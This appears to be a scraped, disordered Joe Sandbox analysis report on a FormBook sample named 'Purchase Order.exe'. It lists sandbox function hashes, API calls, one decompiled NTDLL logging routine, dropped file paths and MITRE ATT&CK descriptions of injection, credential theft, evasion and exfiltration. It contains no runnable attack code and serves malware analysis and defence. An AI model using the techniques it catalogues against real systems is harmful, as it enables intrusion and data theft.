Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 98b76f55fd3b7d3509a7c12961234a1a1e5c7928a975c87dab9bf40fccf8d3fc
Instruction ID: eb3148339fa516952a96c7e7ededbe9bc2275b97d5627d55ba19aab88924f0da
Opcode Fuzzy Hash: 98b76f55fd3b7d3509a7c12961234a1a1e5c7928a975c87dab9bf40fccf8d3fc
Instruction Fuzzy Hash: F401DB32A806287BE722A6959C43FFE776C5B40B50F050519FF04BE2C1F694B90647F6

Uniqueness

Uniqueness Score: -1.00%

Function 003DF7D0 Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 003DF8B8

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 392fa8b1e44bfed52be02085edf610002e98a3400ad03af0875fc9be0383d6b1
Instruction ID: 1f850fe7e4d56c700bd52761815356ea15a0c5ce41b6c169aca11c974001494e
Opcode Fuzzy Hash: 392fa8b1e44bfed52be02085edf610002e98a3400ad03af0875fc9be0383d6b1
Instruction Fuzzy Hash: AC5186BA4003547BDB25EB54CCC5FEB737CAF44300F004A99B65A5B196EB30AB858F60

Uniqueness

Uniqueness Score: -1.00%

Function 003DF7CE Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 003DF8B8

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e2d43290e4b216e60d9ca5dcd304c6b21753d5610878dfd55775309d771e5429
Instruction ID: 4c49a22f3e170b219e7421a59ec00e03948d7e2f0c34d6c59d0c8af0a60a9e4c
Opcode Fuzzy Hash: e2d43290e4b216e60d9ca5dcd304c6b21753d5610878dfd55775309d771e5429
Instruction Fuzzy Hash: 355168BA5103547BDB25EB64CCC5FDB737CAF44300F004A99B65A5B196EB30AB848F60

Uniqueness

Uniqueness Score: -1.00%

Function 003DABD0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 003DAC42

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ca96a5e8033b6ad7c61fa57df96aefaf7a797af34e398c22907a0c48103412d1
Instruction ID: 20e1eb53e5bd6898a7bdc439f5bf7c28e2c0ba750fa78d139ade1cf64ee4c2ca
Opcode Fuzzy Hash: ca96a5e8033b6ad7c61fa57df96aefaf7a797af34e398c22907a0c48103412d1
Instruction Fuzzy Hash: CD0112B6E0010DABDF11DBE5DD42F9DB7789B54308F0042A5A9089B281F671EB54CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003EB550 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,B589D72F,00000000,00000000,?,?,?,B589D72F,?), ref: 003EB58C

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ffb0d83c2de906cfa16c36769e26edb32ac14c93ddcafa200a13cbef46d26088
Instruction ID: 08f97e475e8b02388a4a8836f45be58bdada2f36289a7f09d2aa2d805ab348d3
Opcode Fuzzy Hash: ffb0d83c2de906cfa16c36769e26edb32ac14c93ddcafa200a13cbef46d26088
Instruction Fuzzy Hash: 68E0127338131436E32165A9AC03FABB79CDB85B61F15016AFB4DEB2C1E695F90142E4

Uniqueness

Uniqueness Score: -1.00%

Function 003EB54D Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,B589D72F,00000000,00000000,?,?,?,B589D72F,?), ref: 003EB58C

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 77da928d7e6ac2dabf5a73d4aedf5e12e13d66416e64e49af88ac72eddfed506
Instruction ID: 4f43328c54588527f56f454bf8d1c40a7bf2045a62daece86a9b9888b25df40b
Opcode Fuzzy Hash: 77da928d7e6ac2dabf5a73d4aedf5e12e13d66416e64e49af88ac72eddfed506
Instruction Fuzzy Hash: A4E0D83238039436E33262A99D03FEBB7999BC1B10F25016DF78DAF1C2D6D4E9014255

Uniqueness

Uniqueness Score: -1.00%

Function 003DE2DA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(003E3D02,?,?,003E3D02,00000000,?), ref: 003DE30A

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 765958eeea4d19805ff7b4b91c212a61d36059cd7874270b830bc9770d934506
Instruction ID: afa3f3c945efb3c3d2f9dcd1b3473ea4c48cb09da17433cfcf682e9fa4ce66b9
Opcode Fuzzy Hash: 765958eeea4d19805ff7b4b91c212a61d36059cd7874270b830bc9770d934506
Instruction Fuzzy Hash: F2E0207F10024016E71532786D477BA3A144B04720F1D0749F8389F2C3D22CE6454228

Uniqueness

Uniqueness Score: -1.00%

Function 003DE2E0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(003E3D02,?,?,003E3D02,00000000,?), ref: 003DE30A

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7dae8409021b378cdc820bc000cedab52007afc8d6757658cd2c406443500b0c
Instruction ID: ff5882f7bda321888e5e951b72a736b573f0ab3a07ddbd995e1f4e3cb66f30e8
Opcode Fuzzy Hash: 7dae8409021b378cdc820bc000cedab52007afc8d6757658cd2c406443500b0c
Instruction Fuzzy Hash: 8EE0867E24020427FB2876ACAC46F7A33588B48724F194695F91CDF3C2E774F9414154

Uniqueness

Uniqueness Score: -1.00%

Function 003DE0E8 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,003D889A,?), ref: 003DE11B

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 48f80a14245a950d691250ed9e9e2207706e6f22ae5852306e616b269442079e
Instruction ID: 24e1c6de9041318c382881f6cdeeb3a699a677310e02d330fad5898ef9b5f43c
Opcode Fuzzy Hash: 48f80a14245a950d691250ed9e9e2207706e6f22ae5852306e616b269442079e
Instruction Fuzzy Hash: 96E08C767402043AE720EAA0DC43F9A3354AB58340F1500A0F949EB2C3EA20E5018660

Uniqueness

Uniqueness Score: -1.00%

Function 003ECA10 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(003E69F6,?,003E719D,003E719D,?,003E69F6,?,?,?,?,?,00000000,00000005,00000206), ref: 003ECA3D

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction ID: 8d2808086539fdb76259009dea5bf1c17820ef1a62fa697a1dce5caa69d846f7
Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction Fuzzy Hash: 00E04FB52002146BD714DF59DC45E9737ACEF88750F014154FE095B341C530F910CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 003ECA50 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 003ECA7D

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction ID: f104ff878cb83a36f6ae2bfd218e20a8968bdafc0543be1720635a8dc96ff759
Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction Fuzzy Hash: 00E01AB52002146BD714DF49DC49E9737ACAF88750F014154BA095B241C930E9148AF1

Uniqueness

Uniqueness Score: -1.00%

Function 003ECBB0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,003DDC42,003DDC42,?,00000000,?,?), ref: 003ECBE0

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction ID: 8095e4cb24435019f76402b0b5bfa1f22934bf91381af585bd7efa7dc0d44557
Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction Fuzzy Hash: D2E01AB52002186BD720DF49CC45EE737ADAF89650F118154BA095B241C630E8108AF1

Uniqueness

Uniqueness Score: -1.00%

Function 003DE0F0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,003D889A,?), ref: 003DE11B

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 090e36ee1d11bb142e47d988bbf65383c802cbd94f62c7929ce083ef9e77bf89
Instruction ID: 05a4a4553fa30af88babddb78328e37b420a0c7864f7a90dcbee0d51961e71ba
Opcode Fuzzy Hash: 090e36ee1d11bb142e47d988bbf65383c802cbd94f62c7929ce083ef9e77bf89
Instruction Fuzzy Hash: 64D0A77674030437F610F6E5DC03F1632CC9B48B41F0500A0F908DB3C3E960F5004564

Uniqueness

Uniqueness Score: -1.00%

Function 0452967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04529694

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
Instruction ID: 17dba3ffacc9696046cebc841402da2e65c322d3a7d9d3dddc9c2f3816df4448
Opcode Fuzzy Hash: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
Instruction Fuzzy Hash: 55B02BB19010C4C9F700D76007087173A5077C0702F12C022D1020340A0338E094F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003D4378 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b69f2bfb234a4660430a4355b11136559a41cd0bfe0e8704c2791aa9c94e60
Instruction ID: 0f1b39b0080668a835b3c346f0f42ec1f8fdd3d40b1ff572d8e2dc9433c731d3
Opcode Fuzzy Hash: f7b69f2bfb234a4660430a4355b11136559a41cd0bfe0e8704c2791aa9c94e60
Instruction Fuzzy Hash: 1CD02232E84000C6DB349E88F8902B4F370E7CB321F0C25D7DC5CA31408526D0118284

Uniqueness

Uniqueness Score: -1.00%

Function 0457FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0457FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0452CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04575720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04575720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0457fdda
0x0457fde2
0x0457fde5
0x0457fdec
0x0457fdfa
0x0457fdff
0x0457fe0a
0x0457fe0f
0x0457fe17
0x0457fe1e
0x0457fe19
0x0457fe19
0x0457fe19
0x0457fe20
0x0457fe21
0x0457fe22
0x0457fe25
0x0457fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0457FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0457FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0457FE01

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
Instruction ID: c45c053610e81c6333d7c7df413c397f3541aa6d824a059ad467a06f61bc3de5
Opcode Fuzzy Hash: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
Instruction Fuzzy Hash: C7F0FC322005017FEA211A55EC01F237B6AFB84770F240315F624555D1E9A2F820A6F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Purchase Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sphybwtjm.exe_f770d34aeed427c6ae898f44d1c585448f77cbb_4ba501be_16731091\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER893.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER921.tmp.xml

C:\Users\user\AppData\Local\Temp\178I6H21

C:\Users\user\AppData\Local\Temp\EEF0.tmp

C:\Users\user\AppData\Local\Temp\dmpeedmj.ob

C:\Users\user\AppData\Local\Temp\mlofdcd.wg

C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
Purchase Order.exe

Function 0040352D Relevance: 89.7, APIs: 34, Strings: 17, Instructions: 450
stringfilecomCOMMON

Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403BEC Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405F14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
